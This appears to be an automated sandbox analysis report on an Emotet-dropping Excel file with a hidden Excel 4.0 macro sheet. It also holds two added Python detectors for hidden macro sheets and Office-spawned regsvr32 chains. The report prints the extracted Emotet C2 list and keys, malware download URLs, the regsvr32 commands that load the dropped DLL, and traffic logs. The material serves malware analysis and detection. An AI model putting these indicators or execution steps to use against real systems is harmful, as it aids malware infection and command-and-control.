
Windows Analysis Report
4470_02112022.xls

Overview

General Information

Sample Name:4470_02112022.xls
Analysis ID:746414
MD5:d3b182de8c99553a9f2b6d0f3f030a4f
SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
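The signatures "Found a hidden Excel 4.0 Macro sheet" and "Found Excel 4.0 Macro with suspicious formulas" come from the workbook's BOUNDSHEET records: in the BIFF8 Workbook stream each sheet has a 1-byte visibility state (visible, hidden, very hidden) and a 1-byte type, where 0x01 is an Excel 4.0 macro sheet. The following is an added example, not part of the Joe Sandbox report, that walks such a stream and flags macro sheets that are not visible, which is the classic XLM dropper layout. The stream it scans is constructed inline because the sample itself is not reproduced here; on a real .xls the Workbook stream sits inside an OLE2 container and has to be extracted first (for instance with the olefile package).

```python
"""Scan a BIFF8 Workbook stream for hidden Excel 4.0 (XLM) macro sheets.

Added example; the record layout follows [MS-XLS] (BoundSheet8). The sample
stream below is constructed here, it is not the analysed document.
"""
import struct

BOF, BOUNDSHEET, EOF = 0x0809, 0x0085, 0x000A
SHEET_TYPES = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet",
               0x02: "chart", 0x06: "VBA module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}


def iter_records(stream):
    """Yield (record_type, payload) for every BIFF record in the stream."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        yield rtype, stream[off + 4:off + 4 + rlen]
        off += 4 + rlen


def parse_boundsheet(data):
    """Decode a BoundSheet8 record: BOF offset, state/type bytes, short name."""
    bof_pos, state, sheet_type = struct.unpack_from("<IBB", data, 0)
    cch, str_flags = data[6], data[7]
    if str_flags & 1:                        # fHighByte: UTF-16LE characters
        name = data[8:8 + 2 * cch].decode("utf-16-le")
    else:                                    # compressed 8-bit characters
        name = data[8:8 + cch].decode("latin-1")
    return {"name": name, "bof_offset": bof_pos,
            "visibility": VISIBILITY.get(state & 0x03, "unknown"),
            "type": SHEET_TYPES.get(sheet_type, hex(sheet_type))}


def list_sheets(stream):
    return [parse_boundsheet(d) for t, d in iter_records(stream) if t == BOUNDSHEET]


def find_hidden_macro_sheets(stream):
    """Macro sheets the user cannot see in the sheet tabs: the dropper pattern."""
    return [s for s in list_sheets(stream)
            if s["type"] == "Excel 4.0 macro sheet" and s["visibility"] != "visible"]


def build_boundsheet(name, state, sheet_type, bof_pos):
    """Build a BoundSheet8 record; only used to construct the sample stream."""
    enc = name.encode("latin-1")
    body = struct.pack("<IBB", bof_pos, state, sheet_type) + bytes([len(enc), 0]) + enc
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


# Constructed Workbook stream: a globals BOF, one ordinary sheet, one very
# hidden Excel 4.0 macro sheet, and the closing EOF record.
SAMPLE_WORKBOOK_STREAM = (
    struct.pack("<HH", BOF, 16) + bytes(16)
    + build_boundsheet("Sheet1", 0, 0x00, 0x400)
    + build_boundsheet("Macro1", 2, 0x01, 0x800)
    + struct.pack("<HH", EOF, 0)
)

if __name__ == "__main__":
    for sheet in find_hidden_macro_sheets(SAMPLE_WORKBOOK_STREAM):
        print(f"{sheet['visibility']} macro sheet {sheet['name']!r} "
              f"at stream offset 0x{sheet['bof_offset']:X}")
```

A "very hidden" sheet (state 2) cannot be unhidden from the Excel UI at all, which is why droppers prefer it over plain "hidden"; a workbook whose only macro sheet is in that state is worth treating as malicious before any formula is examined.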

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1540 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 928 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 804 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2640 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 260 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 772 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup
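The process tree is the most reusable part of this report for detection engineering: EXCEL.EXE spawns regsvr32.exe four times with a relative path to a file whose extension (.ooccxx) is not something regsvr32 legitimately registers, and the last instance re-registers the payload from a randomly named subdirectory of System32, which is also the path the persistence entry later runs. The report notes that no Sigma rule matched, so the following added example (not part of the Joe Sandbox output) encodes those three observations as checks over constructed Sysmon-style process-creation events. The PIDs, images and command lines are taken from the tree above; the parent of PID 772 is not shown in the report and is recorded as 0.

```python
"""Flag the Office -> regsvr32 chain from the sandbox process tree.

Added example over constructed process-creation events; the event format is
a simplification of Sysmon Event ID 1 (pid, ppid, image, command line).
"""
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
REGSVR32_EXTENSIONS = {".dll", ".ocx", ".ax"}   # what regsvr32 normally registers
# A DLL one directory below System32 (heuristic: Emotet drops into a random
# subdirectory; legitimate COM servers almost always live in System32 itself).
SYSTEM32_SUBDIR_DLL = re.compile(r"(?i)^c:\\windows\\system32\\[^\\]+\\[^\\]+\.dll$")

REGSVR32 = r"C:\Windows\System32\regsvr32.exe"
EVENTS = [  # constructed from the report's process tree
    {"pid": 2492, "ppid": 0, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"pid": 1540, "ppid": 2492, "image": REGSVR32, "cmdline": REGSVR32 + r" ..\oxnv1.ooccxx"},
    {"pid": 928, "ppid": 2492, "image": REGSVR32, "cmdline": REGSVR32 + r" ..\oxnv2.ooccxx"},
    {"pid": 804, "ppid": 2492, "image": REGSVR32, "cmdline": REGSVR32 + r" ..\oxnv3.ooccxx"},
    {"pid": 2640, "ppid": 2492, "image": REGSVR32, "cmdline": REGSVR32 + r" ..\oxnv4.ooccxx"},
    {"pid": 260, "ppid": 2640, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": r'C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"'},
    {"pid": 772, "ppid": 0, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": r'C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll'},
]


def regsvr32_target(cmdline):
    """Return the module regsvr32 was asked to load.

    Quotes are replaced by spaces before splitting, so the misplaced quote in
    the persistence command line still yields the DLL path; switches such as
    /s, /u or /i:... are skipped. Module paths containing spaces are not
    handled, which is fine for the command lines in this report.
    """
    tokens = cmdline.replace('"', " ").split()
    args = [t for t in tokens[1:] if not t.startswith("/")]
    return args[-1] if args else ""


def detect(events):
    """Return (pid, rule_name, target) for every regsvr32 event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "regsvr32.exe":
            continue
        parent = by_pid.get(e["ppid"])
        target = regsvr32_target(e["cmdline"])
        ext = ntpath.splitext(target)[1].lower()
        if parent and ntpath.basename(parent["image"]).lower() in OFFICE_IMAGES:
            findings.append((e["pid"], "office_spawned_regsvr32", target))
        if target and ext not in REGSVR32_EXTENSIONS:
            findings.append((e["pid"], "regsvr32_non_dll_extension", target))
        if SYSTEM32_SUBDIR_DLL.match(target):
            findings.append((e["pid"], "regsvr32_dll_in_system32_subdir", target))
    return findings


if __name__ == "__main__":
    for pid, rule, target in detect(EVENTS):
        print(f"PID {pid:<5} {rule:<34} {target}")
```

The first two rules fire on the four children of EXCEL.EXE, the third on PIDs 260 and 772. The third rule also catches the persistence instance, whose parent is not in the tree, so it works without parent context; the first rule alone would miss it.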
{"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0qPVGSlYAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWrfVGSlYAAIg="]}
Yara matches, memory dumps (Source | Rule | Description | Author):
0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Emotet_3 | Yara detected Emotet | Joe Security
00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
(3 further entries not shown)
Yara matches, unpacked PE files (Source | Rule | Description | Author):
8.2.regsvr32.exe.2010000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
8.2.regsvr32.exe.2010000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.regsvr32.exe.1d0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
9.2.regsvr32.exe.2b0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
9.2.regsvr32.exe.2b0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
(1 further entry not shown)
                      No Sigma rule has matched
Snort IDS alert
Timestamp: 11/15/22-12:40:56.395248
Source IP: 192.168.2.22
Destination IP: 218.38.121.17
Source Port: 49178
Destination Port: 443
SID: 2404328
Protocol: TCP
Classtype: A Network Trojan was detected

                      AV Detection

Source: 4470_02112022.xls | ReversingLabs: Detection: 80%
Source: 4470_02112022.xls | Virustotal: Detection: 67%
Source: 4470_02112022.xls | Metadefender: Detection: 31%
Source: 4470_02112022.xls | Avira: detected
Source: https://www.3d-stickers.com/page-non-trouvee | Avira URL Cloud: Label: malware
Source: https://www.spinbalence.com/Adapter/moycMR/ | Avira URL Cloud: Label: malware
Source: https://www.spinbalence.com/index.php?controller=404 | Avira URL Cloud: Label: malware
Source: http://www.3d-stickers.com/Content/Afa1PcRuxh/ | Avira URL Cloud: Label: malware
Source: http://navylin.com/bsavxiv/axHQYKl/ | Avira URL Cloud: Label: malware
Source: http://www.spinbalence.com/Adapter/moycMR/ | Avira URL Cloud: Label: malware
Source: www.3d-stickers.com | Virustotal: Detection: 12%
Source: www.spinbalence.com | Virustotal: Detection: 12%
Source: navylin.com | Virustotal: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll | ReversingLabs: Detection: 80%
Source: C:\Users\user\oxnv4.ooccxx | ReversingLabs: Detection: 80%
Source: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy) | ReversingLabs: Detection: 80%
Source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet {"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0qPVGSlYAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWrfVGSlYAAIg="]}
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_100061AC CryptStringToBinaryA,CryptStringToBinaryA,
Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,

                      Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 40hd04O0[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | DNS query: name: sat7ate.com
Source: global traffic | DNS query: name: www.spinbalence.com
Source: global traffic | DNS query: name: www.3d-stickers.com
Source: global traffic | DNS query: name: navylin.com
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then lea r8, qword ptr [000000001009B410h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then lea rdx, qword ptr [000000001009C2C4h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov rax, qword ptr [rsi]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [rdx]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [rdx]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [rcx+rdx]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then cmp rcx, r8
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov al, bpl
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [r8]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov r8, rdi
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movsxd rcx, qword ptr [r12+10h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov rax, r8
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx ecx, byte ptr [r10]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then lea rbx, qword ptr [rsp+70h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movsxd rax, rcx
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx ecx, byte ptr [r10]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov r8d, ebx
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov eax, r10d
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 163.172.108.69:80 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 163.172.108.69:80 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
